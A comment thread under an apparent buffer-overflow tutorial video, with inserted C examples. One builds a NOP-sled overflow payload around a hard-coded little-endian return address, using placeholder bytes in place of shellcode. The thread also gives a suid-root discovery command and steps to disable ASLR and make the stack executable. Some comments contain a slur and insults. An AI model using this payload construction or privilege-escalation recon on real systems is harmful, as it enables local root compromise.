Sorry bro, but you need to actually talk over the video instead of having gay-ass music lol.
It's more educational that way.
gen1mx6 1 month ago
I can't help but notice you started as root... Could you do the same thing as a lower-level user?
LuEPSoft 1 month ago
How do you calculate the address "0xbfff2dc"?
king5201 9 months ago
@king5201 What do you mean by calculate? If you mean the part where you're subtracting the NOP bits, then putting it in little-endian is the way: \xdc\xf2\xff\xbf
sig111immense 9 months ago
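Added example (my own code, not the uploader's or any commenter's) of the step the reply above describes: packing a 32-bit return address as the little-endian bytes \xdc\xf2\xff\xbf and laying it out behind a NOP sled in the overflow buffer. The 512-byte buffer, the int3 bytes standing in for real shellcode, and the use of 0xbffff2dc as the return address are assumptions chosen for illustration; the video's vulnapp itself is not on the page.

```c
/* Added example, not from the video. x86, 32-bit addresses, ASLR assumed off
 * so that a fixed stack address (0xbffff2dc, taken from the thread) is valid. */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define NOP 0x90u

/* Write a 32-bit address as the 4 bytes an x86 CPU reads it from memory:
 * least significant byte first. 0xbffff2dc -> dc f2 ff bf */
void pack_le32(uint32_t addr, uint8_t out[4]) {
    out[0] = (uint8_t)(addr & 0xffu);
    out[1] = (uint8_t)((addr >> 8) & 0xffu);
    out[2] = (uint8_t)((addr >> 16) & 0xffu);
    out[3] = (uint8_t)((addr >> 24) & 0xffu);
}

/* Inverse: read 4 little-endian bytes back into an address (handy in gdb dumps). */
uint32_t unpack_le32(const uint8_t in[4]) {
    return (uint32_t)in[0] | ((uint32_t)in[1] << 8) |
           ((uint32_t)in[2] << 16) | ((uint32_t)in[3] << 24);
}

/* Pick a return address inside the NOP sled. The sled starts at buf_addr, so
 * aiming at its middle tolerates the stack address being off by up to
 * nop_len/2 bytes in either direction. */
uint32_t sled_target(uint32_t buf_addr, size_t nop_len) {
    return buf_addr + (uint32_t)(nop_len / 2);
}

/* Layout: [NOP sled][shellcode][return address repeated to the end].
 * The address is written 4-byte aligned relative to the buffer start so that
 * the saved EIP slot, wherever it lies past the buffer, gets a whole copy.
 * Returns the number of bytes written, 0 if the pieces do not fit. */
size_t build_payload(uint8_t *out, size_t total_len,
                     const uint8_t *shellcode, size_t sc_len,
                     size_t nop_len, uint32_t ret_addr) {
    uint8_t le[4];
    size_t pos;
    if (nop_len + sc_len > total_len) return 0;
    memset(out, NOP, nop_len);
    memcpy(out + nop_len, shellcode, sc_len);
    pack_le32(ret_addr, le);
    for (pos = nop_len + sc_len; pos < total_len; pos++)
        out[pos] = le[pos % 4];
    return pos;
}

/* Print as the \xNN escapes you would paste into perl -e or printf. */
void print_escaped(const uint8_t *p, size_t n) {
    for (size_t i = 0; i < n; i++) printf("\\x%02x", p[i]);
    putchar('\n');
}

int main(void) {
    /* Stand-in for shellcode: four int3 breakpoints (assumption, not a real payload). */
    static const uint8_t shellcode[] = { 0xcc, 0xcc, 0xcc, 0xcc };
    uint8_t payload[512];
    uint32_t ret = 0xbffff2dcu;   /* address from the thread, assumed to sit in the sled */
    size_t n = build_payload(payload, sizeof payload, shellcode, sizeof shellcode, 256, ret);
    print_escaped(payload, n);
    return 0;
}
```

If you know the buffer's own address from gdb rather than an address inside the sled, use sled_target() to derive the return address; a sled of a few hundred NOPs is what makes "approximately right" good enough.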
Nice.. now a video about fuzzing... and we're all set, eh? ;)
darkdan4ever 9 months ago
will you decipher the ...::: OnyxCode :::...
OnyxCode 10 months ago
@OnyxCode check your profile
sig111immense 10 months ago
For anyone wondering, what he did at the end was set the suid bit. Basically, when the program runs, it normally runs as the owner of the file (in this case root but not always). This is common for programs such as passwd (to change your password). The passwd program edits /etc/passwd even when run by a normal user. On the other hand, if this program was a network program, you could use something similar to connect via the network to get a shell as the user who is running the program.
wolfricacc 1 year ago
@wolfricacc Thanks for that :) A good explanation for those who were curious :)
sig111immense 1 year ago
@wolfricacc What "he" did in the end? So you're saying this video isn't yours?
NoShit12 1 year ago
@NoShit12 No, sure, I'm not even the uploader. sig111immense is.
wolfricacc 1 year ago
Wow, the music is bad-ass, what's the name of it?
Tsakos17 1 year ago
@Tsakos17 If you hear some sort of song on any youtube video, check out close to the bottom of the About Video section. It shows Juno Reactor - Masters of the Universe. That's the song name. Just a little tip. ;-)
2pimpinout 1 year ago
@2pimpinout Thanks for that, saving me a reply :P
sig111immense 1 year ago
Why did you do it all as root?
You should have shown how the sticky bit works too, to make it like a real exploit:
chmod a=xs ./vulnapp
staxjp 1 year ago
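Added example (my own code, not the uploader's or either commenter's) for wolfricacc's explanation of the setuid bit above and staxjp's chmod line: what a process sees when it runs from a setuid binary, and how to check a file for the owner-root plus setuid plus world-executable combination that makes an overflow in it a root shell. The vulnapp name and the temp file the demo creates are assumptions. Linux/POSIX only.

```c
/* Added example, not from the video or the thread. */
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

struct suid_report {
    int setuid;      /* S_ISUID set */
    int setgid;      /* S_ISGID set */
    int world_exec;  /* others may execute it */
    uid_t owner;     /* whose privileges a setuid exec acquires */
};

/* Pure helpers on mode bits, so they can be checked without touching the filesystem. */
int mode_has_setuid(mode_t mode) { return (mode & S_ISUID) != 0; }
int mode_world_exec(mode_t mode) { return (mode & S_IXOTH) != 0; }

/* stat() a path and fill the report. Returns 0 on success, -1 on error. */
int inspect_setuid(const char *path, struct suid_report *r) {
    struct stat st;
    if (stat(path, &st) != 0) return -1;
    r->setuid = mode_has_setuid(st.st_mode);
    r->setgid = (st.st_mode & S_ISGID) != 0;
    r->world_exec = mode_world_exec(st.st_mode);
    r->owner = st.st_uid;
    return 0;
}

/* 1 if an overflow in this file hands any local user the owner's (root's)
 * privileges: the passwd situation, and what `chmod a=xs ./vulnapp` creates
 * when the file is owned by root. */
int root_suid_exposed(const struct suid_report *r) {
    return r->setuid && r->owner == 0 && r->world_exec;
}

/* What the program itself sees: a setuid binary keeps the caller's real uid
 * but runs with the owner's effective uid. That is why shellcode usually does
 * setuid(0) before execve("/bin/sh"): a shell started with uid != euid would
 * otherwise drop the privilege. */
void show_ids(void) {
    printf("uid=%u euid=%u\n", (unsigned)getuid(), (unsigned)geteuid());
}

/* Self-contained demo: create a temp file, set the bits the way `chmod a=xs`
 * does (execute + setuid/setgid, no read/write), inspect it, remove it.
 * Returns 1 if the setuid bit is reported, 0 if not, -1 on error. */
int demo_setuid_roundtrip(void) {
    char name[] = "/tmp/suid_demo_XXXXXX";
    int fd = mkstemp(name);
    int ok = -1;
    if (fd < 0) {                       /* fall back to the current directory */
        strcpy(name, "suid_demo_XXXXXX");
        fd = mkstemp(name);
        if (fd < 0) return -1;
    }
    /* Only the owner may set S_ISUID on a file; the kernel clears S_ISGID if
     * the caller is not in the file's group, so the check below ignores it. */
    if (fchmod(fd, S_IXUSR | S_IXGRP | S_IXOTH | S_ISUID | S_ISGID) == 0) {
        struct suid_report r;
        if (inspect_setuid(name, &r) == 0) ok = r.setuid && r.world_exec;
    }
    close(fd);
    unlink(name);
    return ok;
}

int main(int argc, char **argv) {
    struct suid_report r;
    const char *path = argc > 1 ? argv[1] : "./vulnapp";   /* assumed name */
    show_ids();
    if (inspect_setuid(path, &r) == 0)
        printf("%s: setuid=%d setgid=%d world_exec=%d owner=%u exposed=%d\n",
               path, r.setuid, r.setgid, r.world_exec, (unsigned)r.owner,
               root_suid_exposed(&r));
    printf("demo roundtrip: %d\n", demo_setuid_roundtrip());
    return 0;
}
```

The same inspection over a whole system is `find / -perm -4000 -user root -type f`; binaries that show up there are the ones where a local overflow like the video's is a privilege escalation rather than a shell you already had.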
@staxjp Well, what the video is showing still works as a normal user anyway, and at the end, as you can see, I completed the exploit as a non-root user.
sig111immense 1 year ago
@sig111immense
staxjp 1 year ago
@sig111immense This is an awesome tutorial!!! Kudos! I just said the sticky bit thing for dramatic effect...
staxjp 1 year ago
@staxjp Thanks man! Oh yeah, I get you now, it would have looked better I suppose :P But oh well, you can all do it yourselves from this tutorial now anyway! :D
sig111immense 1 year ago
I can't believe that it's so easy to get root privileges on Linux...
It would be great if you made a video tutorial about the stack structure, to know more about it.
Thank you, and I'm sorry for my English, bye
augus1990 1 year ago
@augus1990 Remember, I turned ASLR off, which makes it virtually unrealistic that it will be this easy in a real-life situation; Linux kernel 2.6 and later now has ASLR enabled, meaning this exact way won't work. And yes, that's a good idea augus, I may make a video explaining each step and what is happening with the stack at each moment. Thanks for the comment, and your English is good :D
sig111immense 1 year ago
@sig111immense It works on Windows; they don't seem to have stack protection even with Windows Server 2008. All they have is DEP, and all that does is randomize the name space, similar to randomize_va_space, so you can still do a buffer overflow if you inject the code directly, which is what is done here. The only attack it really stops is those who choose to exploit locally by putting shellcode into a system variable and then using the BO to jump to that segment.
staxjp 1 year ago
@staxjp Yeah I know, but ASLR is what randomizes the stack, not DEP. DEP is for making code on the stack non-executable and stopping execution etc. DEP + ASLR bypass is the way to exploit on Windows, much more complicated than the Linux kernel.
sig111immense 1 year ago
@sig111immense Hmm, I have a copy of Windows Server 2008 I've been playing with. I have DEP turned on; when I turn it off, the randomization stops... When DEP is on, I am able to create a simple buffer overflow jumping to a segment of memory and having it execute. It does the same thing on a few other machines in class. I'm not injecting shellcode or anything, I am just making it jump to an existing function within the code that it cannot access from the main loop, only by overflow...
staxjp 1 year ago
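Added example (my own code, not the uploader's or either commenter's) for the ASLR caveat in sig111immense's reply to augus1990 and the DEP-versus-ASLR exchange above, on the Linux side: read the randomize_va_space sysctl the video turned off, watch the stack base move between fresh processes when it is on, and read the [stack] mapping's permission bits, which is where the NX/DEP half shows up (rwxp means an executable stack, rw-p means the shellcode-on-the-stack approach is blocked). Linux-only, since it reads /proc; the maps line in the self-check is constructed.

```c
/* Added example, not from the video or the thread. Linux only. */
#define _POSIX_C_SOURCE 200809L
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* /proc/sys/kernel/randomize_va_space: 0 = no ASLR (the video's setup),
 * 1 = stack, mmap and vdso randomized, 2 = brk as well. -1 if unreadable. */
int read_randomize_va_space(void) {
    FILE *f = fopen("/proc/sys/kernel/randomize_va_space", "r");
    int v = -1;
    if (!f) return -1;
    if (fscanf(f, "%d", &v) != 1) v = -1;
    fclose(f);
    return v;
}

/* Parse one maps line "start-end perms offset dev inode path".
 * Returns the start address, 0 if the line does not parse. perms_out, when
 * non-NULL, receives the 4-character permission field ("rw-p", "rwxp", ...). */
uintptr_t parse_maps_line(const char *line, char perms_out[5]) {
    unsigned long long start, end;
    char perms[5];
    if (sscanf(line, "%llx-%llx %4s", &start, &end, perms) != 3) return 0;
    if (perms_out) { memcpy(perms_out, perms, 4); perms_out[4] = '\0'; }
    return (uintptr_t)start;
}

/* Scan a maps stream for the [stack] mapping. Returns its start, 0 if absent. */
uintptr_t stack_base_from(FILE *f, char perms_out[5]) {
    char line[512];
    while (fgets(line, sizeof line, f))
        if (strstr(line, "[stack]")) return parse_maps_line(line, perms_out);
    return 0;
}

/* Is this process's stack executable? 1 yes, 0 no, -1 unknown.
 * A binary linked with -z execstack, or with an .s file lacking the
 * .note.GNU-stack section, gets "rwxp" here; the default is "rw-p". */
int stack_is_executable(void) {
    FILE *f = fopen("/proc/self/maps", "r");
    char perms[5] = "";
    uintptr_t base;
    if (!f) return -1;
    base = stack_base_from(f, perms);
    fclose(f);
    if (!base) return -1;
    return perms[2] == 'x';
}

/* Spawn a fresh process (cat reading its own maps) and return its stack base.
 * ASLR is applied at exec, so every new process gets its own layout. */
uintptr_t fresh_process_stack_base(void) {
    FILE *p = popen("cat /proc/self/maps", "r");
    uintptr_t base;
    if (!p) return 0;
    base = stack_base_from(p, NULL);
    pclose(p);
    return base;
}

/* 1 if two fresh processes got different stack bases, 0 if identical,
 * -1 if the probe failed. With randomize_va_space=0 this is 0, which is why
 * an address read once in gdb keeps working in the video; with 1 or 2 it is
 * 1, and the hard-coded 0xbffff2dc-style address stops being reusable. */
int aslr_observed(void) {
    uintptr_t a = fresh_process_stack_base();
    uintptr_t b = fresh_process_stack_base();
    if (!a || !b) return -1;
    return a != b;
}

int main(void) {
    printf("randomize_va_space  = %d\n", read_randomize_va_space());
    printf("stack executable    = %d\n", stack_is_executable());
    printf("stack moves on exec = %d\n", aslr_observed());
    return 0;
}
```

To reproduce the video's conditions on a modern box you need both answers to come out the way it had them: `sysctl -w kernel.randomize_va_space=0` (or `setarch -R` for one process) and a target built with `-z execstack`; with the defaults, the return address is wrong on every run and the NOP sled is in a non-executable page even when it is right.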
hi, I really liked the music !! What's it called?
viralchristian 1 year ago
@viralchristian Juno Reactor - Masters of the Universe
sig111immense 1 year ago
- Thanks !!
viralchristian 1 year ago
lol, such technical language. Q_Q I don't know any coding language, so yeah. :L Useless comment.
Otsimura 1 year ago
@Otsimura Your mom is a useless comment
staxjp 1 year ago